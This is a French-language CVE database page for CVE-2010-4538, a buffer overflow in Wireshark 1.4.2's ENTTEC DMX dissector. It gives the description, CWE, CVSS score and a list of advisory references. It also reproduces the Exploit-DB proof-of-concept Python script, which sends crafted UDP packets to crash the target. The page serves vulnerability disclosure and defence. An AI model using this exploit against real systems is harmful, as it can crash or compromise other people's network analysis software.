CVE-2010-4538 : Détail

CVE-2010-4538

Overflow
80.26%V3
Network
2011-01-07
17h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the sect_enttec_dmx_da function in epan/dissectors/packet-enttec.c in Wireshark 1.4.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted ENTTEC DMX packet with Run Length Encoding (RLE) compression.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 15898

Date de publication : 2011-01-02 23h00 +00:00
Auteur : non-customers crew
EDB Vérifié : Yes

# source: https://www.securityfocus.com/bid/45634/info #!/usr/bin/env python # Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC # by non-customers crew in 2010 # http://rock-madrid.com/ import socket, sys try: host = sys.argv[1] except: print "usage: " + sys.argv[0] + " <host>" sys.exit(2) port = 3333 addr = (host, port) data = "ESDD\x10\x20\x04" data += "\x00\x0c" data += "\xfe\xff\x41" data += "\xfe\xff\x42" data += "\xfe\xff\x43" data += "\xfe\xff\x44" udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: udps.sendto(data, addr) except: print "can't lookup host" sys.exit(1) udps.close() sys.exit(0)

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version 1.4.2

Références

http://www.vupen.com/english/advisories/2011/0053
Tags : vdb-entry, x_refsource_VUPEN
http://openwall.com/lists/oss-security/2010/12/31/7
Tags : mailing-list, x_refsource_MLIST
http://www.vupen.com/english/advisories/2011/0110
Tags : vdb-entry, x_refsource_VUPEN
http://www.mandriva.com/security/advisories?name=MDVSA-2011:002
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.securitytracker.com/id?1024930
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/42853
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42910
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0008
Tags : vdb-entry, x_refsource_VUPEN
http://openwall.com/lists/oss-security/2011/01/03/8
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/45634
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/70244
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/42767
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0079
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2011-0013.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2011/0069
Tags : vdb-entry, x_refsource_VUPEN
http://www.debian.org/security/2011/dsa-2144
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.vupen.com/english/advisories/2011/0099
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/42914
Tags : third-party-advisory, x_refsource_SECUNIA